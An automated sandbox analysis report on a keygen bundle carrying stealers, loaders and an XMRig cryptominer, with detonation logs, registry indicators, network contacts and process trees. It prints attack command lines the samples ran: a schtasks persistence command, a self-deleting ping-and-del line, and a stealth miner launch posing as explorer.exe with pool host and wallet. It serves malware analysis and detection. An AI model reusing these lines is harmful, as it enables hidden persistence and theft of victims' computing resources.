Malware Analysis Report

2024-11-15 09:03

Sample ID: 241110-p9k86axerd
Target: 4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66
SHA256: 4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66
Tags: loader azorult privateloader discovery infostealer trojan ffdroider spyware stealer fabookie gcleaner onlylogger xmrig miner smokeloader pub1 backdoor evasion
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: 4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66

Threat Level: Known bad

The file 4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66 was found to be: Known bad.

Malicious Activity Summary

Privateloader family

Azorult

Detect Fabookie payload

FFDroider payload

SmokeLoader

OnlyLogger

Fabookie family

Ffdroider family

GCleaner

Onlylogger family

Azorult family

Gcleaner family

xmrig

Xmrig family

Fabookie

Smokeloader family

FFDroider

OnlyLogger payload

XMRig Miner payload

Deletes itself

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Program crash

System Location Discovery: System Language Discovery

Runs ping.exe

Scheduled Task/Job: Scheduled Task

Modifies system certificate store

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Analysis: static1

Detonation Overview

Reported

2024-11-10 13:01

Signatures

Azorult family

azorult

Privateloader family

privateloader

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp

Files

memory/2140-0-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Network


Files

memory/3252-0-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

57s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe" -a

Network

Country Destination Domain Proto
US 8.8.8.8:53 live.goatgame.live udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe"

Signatures

FFDroider

stealer ffdroider

FFDroider payload

Ffdroider family

ffdroider

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe"

Network

Country Destination Domain Proto
RU 186.2.171.3:80 tcp

Files

memory/2068-0-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2068-1-0x0000000000020000-0x0000000000023000-memory.dmp

memory/2068-3-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2068-6-0x0000000000400000-0x0000000000667000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240729-en

Max time kernel

16s

Max time network

20s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 8.8.8.8:53 2no.co udp
US 104.21.79.229:443 2no.co tcp
US 104.21.79.229:443 2no.co tcp

Files

memory/2212-0-0x000007FEF64B3000-0x000007FEF64B4000-memory.dmp

memory/2212-1-0x0000000001070000-0x000000000108E000-memory.dmp

memory/2212-2-0x0000000000350000-0x000000000036A000-memory.dmp

memory/2212-3-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp

memory/2212-4-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"

Signatures

Detect Fabookie payload

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

Xmrig family

xmrig

xmrig

miner xmrig

OnlyLogger payload

XMRig Miner payload

miner
Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4940 set thread context of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1016 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1016 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1016 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1016 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1016 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 4068 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 816 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4068 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 4940 wrote to memory of 220 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 4940 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 220 wrote to memory of 4524 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 960

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1140

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1208

Network


Files


Analysis: behavioral17

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Files

memory/2648-0-0x00000000000F0000-0x0000000000108000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2164 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2164 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2164 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243708 0

Network

Files

memory/2164-0-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/4756-12-0x0000000000D60000-0x0000000000E45000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Roaming\services64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob data omitted] C:\Users\Admin\AppData\Roaming\services64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob data omitted] C:\Users\Admin\AppData\Roaming\services64.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1552 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1552 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1552 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1552 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1552 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1552 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1552 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1552 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1552 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1552 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1552 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1552 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1552 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1552 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1552 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2816 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2816 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2816 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2884 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2884 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2884 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2816 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 2816 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 2816 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 876 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 876 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 876 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 876 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 876 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 876 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 1848 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1848 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1848 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

